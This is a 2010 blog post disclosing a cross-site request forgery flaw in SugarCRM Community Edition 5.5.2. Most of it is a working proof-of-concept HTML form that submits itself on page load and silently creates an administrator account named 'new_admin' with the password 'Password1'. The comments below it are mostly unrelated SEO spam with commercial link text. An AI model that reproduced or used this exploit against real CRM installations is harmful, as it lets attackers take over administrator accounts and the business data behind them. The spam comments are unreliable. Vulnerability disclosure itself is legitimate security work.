This site is soon to be deprecated by

Sunday, May 30, 2010

SugarCRM Community Edition 5.5.2 Cross-site Request Forgery

A cross-site request forgery vulnerability in SugarCRM Community Edition 5.5.2 can be exploited to create a new admin.

<body onload="document.forms[0].submit()">
<form method="POST" action="">
<input type="hidden" name="display_tabs_def" value="display_tabs[]=Home&amp;display_tabs[]=Dashboard&amp;display_tabs[]=Calendar&amp;display_tabs[]=Activities&amp;display_tabs[]=Leads&amp;display_tabs[]=Contacts&amp;display_tabs[]=Accounts&amp;display_tabs[]=Opportunities&amp;display_tabs[]=Emails&amp;display_tabs[]=Campaigns&amp;display_tabs[]=Cases&amp;display_tabs[]=Documents&amp;" />
<input type="hidden" name="hide_tabs_def" value="" />
<input type="hidden" name="remove_tabs_def" value="" />
<input type="hidden" name="module" value="Users" />
<input type="hidden" name="record" value="" />
<input type="hidden" name="action" value="Save" />
<input type="hidden" name="page" value="EditView" />
<input type="hidden" name="return_module" value="Users" />
<input type="hidden" name="return_id" value="" />
<input type="hidden" name="return_action" value="DetailView" />
<input type="hidden" name="password_change" value="true" />
<input type="hidden" name="required_password" value="1" />
<input type="hidden" name="user_name" value="" />
<input type="hidden" name="type" value="" />
<input type="hidden" name="is_group" value="0" />
<input type="hidden" name="portal_only" value="" />
<input type="hidden" name="is_admin" value="1" />
<input type="hidden" name="is_current_admin" value="1" />
<input type="hidden" name="required_email_address" value="0" />
<input type="hidden" name="sugar_user_name" value="new_admin" />
<input type="hidden" name="unique_name" value="" />
<input type="hidden" name="first_name" value="" />
<input type="hidden" name="status" value="Active" />
<input type="hidden" name="last_name" value="a" />
<input type="hidden" name="UserType" value="Administrator" />
<input type="hidden" name="old_password" value="" />
<input type="hidden" name="new_password" value="Password1" />
<input type="hidden" name="confirm_new_password" value="Password1" />
<input type="hidden" name="emailAddressWidget" value="1" />
<input type="hidden" name="emailAddress0" value="" />
<input type="hidden" name="emailAddressPrimaryFlag" value="emailAddress0" />
<input type="hidden" name="emailAddressVerifiedFlag0" value="true" />
<input type="hidden" name="emailAddressVerifiedValue0" value="" />
<input type="hidden" name="useEmailWidget" value="true" />
<input type="hidden" name="email_link_type" value="sugar" />
<input type="hidden" name="mail_smtpuser" value="" />
<input type="hidden" name="mail_smtppass" value="" />
<input type="hidden" name="employee_status" value="Active" />
<input type="hidden" name="title" value="" />
<input type="hidden" name="phone_work" value="" />
<input type="hidden" name="department" value="" />
<input type="hidden" name="phone_mobile" value="" />
<input type="hidden" name="reports_to_name" value="" />
<input type="hidden" name="reports_to_id" value="" />
<input type="hidden" name="phone_other" value="" />
<input type="hidden" name="phone_fax" value="" />
<input type="hidden" name="phone_home" value="" />
<input type="hidden" name="messenger_type" value="" />
<input type="hidden" name="messenger_id" value="" />
<input type="hidden" name="address_street" value="" />
<input type="hidden" name="address_city" value="" />
<input type="hidden" name="address_state" value="" />
<input type="hidden" name="address_postalcode" value="" />
<input type="hidden" name="address_country" value="" />
<input type="hidden" name="description" value="" />
<input type="hidden" name="receive_notifications" value="12" />
<input type="hidden" name="export_delimiter" value="," />
<input type="hidden" name="mailmerge_on" value="0" />
<input type="hidden" name="reminder_time" value="60" />
<input type="hidden" name="default_export_charset" value="ISO-8859-1" />
<input type="hidden" name="user_max_tabs" value="12" />
<input type="hidden" name="user_max_subtabs" value="12" />
<input type="hidden" name="user_subpanel_tabs" value="on" />
<input type="hidden" name="dateformat" value="m/d/Y" />
<input type="hidden" name="currency" value="-99" />
<input type="hidden" name="timeformat" value="H:i" />
<input type="hidden" name="default_currency_significant_digits" value="2" />
<input type="hidden" name="timezone" value="Africa/Abidjan" />
<input type="hidden" name="ut" value="0" />
<input type="hidden" name="num_grp_sep" value="," />
<input type="hidden" name="default_locale_name_format" value="s f l" />
<input type="hidden" name="dec_sep" value="." />
<input type="hidden" name="calendar_publish_key" value="" />
<input type="hidden" name="outboundtest_from_address" value="" />


  1. John Leitch has discovered a vulnerability in SugarCRM, which can be exploited by malicious people to conduct cross-site request forgery attacks.

    churches in fresno ca

  2. When the matter in the content is valued according to guidelines as per the search engines, then it gets a full priority in the index
    of search engines. Once you achieve a good ranking by search engines, your website will be made visible to clients on the first page.

    website design templates
    ecommerce web design

  3. J.Design Group with over 25 years of experience offers a complete range of high end interior design services and decoration of commercial and residential outfits in different communities throughout Florida

    Modern interior designer
    install windows 8 from pendrive

  4. There is a proven connection between prebiotics and weight loss, although they certainly aren't a miracle cure. Find out how to maximize the weight loss and other health benefits you get from these prebiotics.

    indvendige dvre
    e cigarette

  5. Americans throw away about 25 billion Styrofoam coffee cups every year, and 2.5 million plastic beverage bottles every hour. Most of these materials do not biodegrade.

    Passages Malibu Treatment
    alarm service companies

  6. celebrity rumorshervey bay accomodationThe cost of the 3G access for all 3G-enabled Kindles is bundled into the purchase price of the Kindle. This means that Kindle 3G users do not have to subscribe to a data service.
    Amazon also offers the Kindle Keyboard with 3G service, but the device is not sold at AT&T retail locations.
    Amazon also sells Kindle e-readers without 3G service. These devices cost about $50 less than the 3G versions and they

  7. Wonderful blog! I found it while searching on Yahoo News. Do you have any tips on how to get listed in Yahoo News? I’ve been trying for a while but I never sbobet
    seem to get there! Many thanks.

  8. Nice Post,
    vtiger CRM is free open source CRM with full-featured. vTiger crm is best suited for small and medium sized

    VTiger CRM
    vTiger Integration